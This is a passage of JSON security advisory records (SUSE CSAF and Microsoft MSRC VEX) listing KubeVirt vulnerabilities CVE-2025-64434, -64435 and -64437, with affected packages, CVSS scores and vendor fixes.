"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:51:11Z",
"details": "moderate"
}
],
"title": "CVE-2025-64435"
},
{
"cve": "CVE-2025-64437",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64437"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. In versions before 1.5.3 and 1.6.1, the virt-handler does not verify whether the launcher-sock is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher), thus compromising the confidentiality, integrity and availability (CIA) of data on the host. To successfully exploit this vulnerability, an attacker must be in control of the file system of the virt-launcher pod. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64437",
"url": "https://www.suse.com/security/cve/CVE-2025-64437"
},
{
"category": "external",
"summary": "SUSE Bug 1253194 for CVE-2025-64437",
"url": "https://bugzilla.suse.com/1253194"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.9,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:51:11Z",
"details": "low"
}
],
"title": "CVE-2025-64437"
}
]
}
MSRC_CVE-2025-64434
Vulnerability from csaf_microsoft - Published: 2025-11-02 00:00 - Updated: 2026-01-13 01:40Notes
{
"document": {
"category": "csaf_vex",
"csaf_version": "2.0",
"distribution": {
"text": "Public",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en-US",
"notes": [
{
"category": "general",
"text": "To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle",
"title": "Additional Resources"
},
{
"category": "legal_disclaimer",
"text": "The information provided in the Microsoft Knowledge Base is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.",
"title": "Disclaimer"
}
],
"publisher": {
"category": "vendor",
"contact_details": "secure@microsoft.com",
"name": "Microsoft Security Response Center",
"namespace": "https://msrc.microsoft.com"
},
"references": [
{
"category": "self",
"summary": "CVE-2025-64434 KubeVirt Improper TLS Certificate Management Handling Allows API Identity Spoofing - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-64434.json"
},
{
"category": "external",
"summary": "Microsoft Support Lifecycle",
"url": "https://support.microsoft.com/lifecycle"
},
{
"category": "external",
"summary": "Common Vulnerability Scoring System",
"url": "https://www.first.org/cvss"
}
],
"title": "KubeVirt Improper TLS Certificate Management Handling Allows API Identity Spoofing",
"tracking": {
"current_release_date": "2026-01-13T01:40:10.000Z",
"generator": {
"date": "2026-02-18T14:58:53.121Z",
"engine": {
"name": "MSRC Generator",
"version": "1.0"
}
},
"id": "msrc_CVE-2025-64434",
"initial_release_date": "2025-11-02T00:00:00.000Z",
"revision_history": [
{
"date": "2025-11-09T01:01:52.000Z",
"legacy_version": "1",
"number": "1",
"summary": "Information published."
},
{
"date": "2025-12-06T14:39:32.000Z",
"legacy_version": "2",
"number": "2",
"summary": "Information published."
},
{
"date": "2025-12-07T01:47:45.000Z",
"legacy_version": "3",
"number": "3",
"summary": "Information published."
},
{
"date": "2026-01-02T14:39:30.000Z",
"legacy_version": "4",
"number": "4",
"summary": "Information published."
},
{
"date": "2026-01-13T01:40:10.000Z",
"legacy_version": "5",
"number": "5",
"summary": "Information published."
}
],
"status": "final",
"version": "5"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "2.0",
"product": {
"name": "CBL Mariner 2.0",
"product_id": "17086"
}
},
{
"category": "product_version",
"name": "3.0",
"product": {
"name": "Azure Linux 3.0",
"product_id": "17084"
}
}
],
"category": "product_name",
"name": "Azure Linux"
},
{
"branches": [
{
"category": "product_version_range",
"name": "cbl2 kubevirt 0.59.0-30",
"product": {
"name": "cbl2 kubevirt 0.59.0-30",
"product_id": "4"
}
},
{
"category": "product_version_range",
"name": "cbl2 kubevirt 0.59.0-31",
"product": {
"name": "cbl2 kubevirt 0.59.0-31",
"product_id": "2"
}
},
{
"category": "product_version_range",
"name": "\u003cazl3 kubevirt 1.5.0-5",
"product": {
"name": "\u003cazl3 kubevirt 1.5.0-5",
"product_id": "3"
}
},
{
"category": "product_version",
"name": "azl3 kubevirt 1.5.0-5",
"product": {
"name": "azl3 kubevirt 1.5.0-5",
"product_id": "20656"
}
},
{
"category": "product_version_range",
"name": "\u003ccbl2 kubevirt 0.59.0-33",
"product": {
"name": "\u003ccbl2 kubevirt 0.59.0-33",
"product_id": "1"
}
},
{
"category": "product_version",
"name": "cbl2 kubevirt 0.59.0-33",
"product": {
"name": "cbl2 kubevirt 0.59.0-33",
"product_id": "20772"
}
}
],
"category": "product_name",
"name": "kubevirt"
}
],
"category": "vendor",
"name": "Microsoft"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "cbl2 kubevirt 0.59.0-30 as a component of CBL Mariner 2.0",
"product_id": "17086-4"
},
"product_reference": "4",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cbl2 kubevirt 0.59.0-31 as a component of CBL Mariner 2.0",
"product_id": "17086-2"
},
"product_reference": "2",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003cazl3 kubevirt 1.5.0-5 as a component of Azure Linux 3.0",
"product_id": "17084-3"
},
"product_reference": "3",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "azl3 kubevirt 1.5.0-5 as a component of Azure Linux 3.0",
"product_id": "20656-17084"
},
"product_reference": "20656",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003ccbl2 kubevirt 0.59.0-33 as a component of CBL Mariner 2.0",
"product_id": "17086-1"
},
"product_reference": "1",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cbl2 kubevirt 0.59.0-33 as a component of CBL Mariner 2.0",
"product_id": "20772-17086"
},
"product_reference": "20772",
"relates_to_product_reference": "17086"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-64434",
"cwe": {
"id": "CWE-287",
"name": "Improper Authentication"
},
"notes": [
{
"category": "general",
"text": "GitHub_M",
"title": "Assigning CNA"
}
],
"product_status": {
"fixed": [
"20656-17084",
"20772-17086"
],
"known_affected": [
"17086-4",
"17086-2",
"17084-3",
"17086-1"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-64434 KubeVirt Improper TLS Certificate Management Handling Allows API Identity Spoofing - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-64434.json"
}
],
"remediations": [
{
"category": "none_available",
"date": "2025-11-09T01:01:52.000Z",
"details": "No fix is currently available for this vulnerability.",
"product_ids": [
"17086-4"
]
},
{
"category": "none_available",
"date": "2025-11-09T01:01:52.000Z",
"details": "No fix is currently available for this vulnerability.",
"product_ids": [
"17086-2"
]
},
{
"category": "vendor_fix",
"date": "2025-11-09T01:01:52.000Z",
"details": "1.5.3-2:Security Update:https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade",
"product_ids": [
"17084-3"
],
"url": "https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"environmentalsScore": 0.0,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"temporalScore": 4.7,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"17086-4",
"17086-2",
"17084-3",
"17086-1"
]
}
],
"title": "KubeVirt Improper TLS Certificate Management Handling Allows API Identity Spoofing"
}
]
}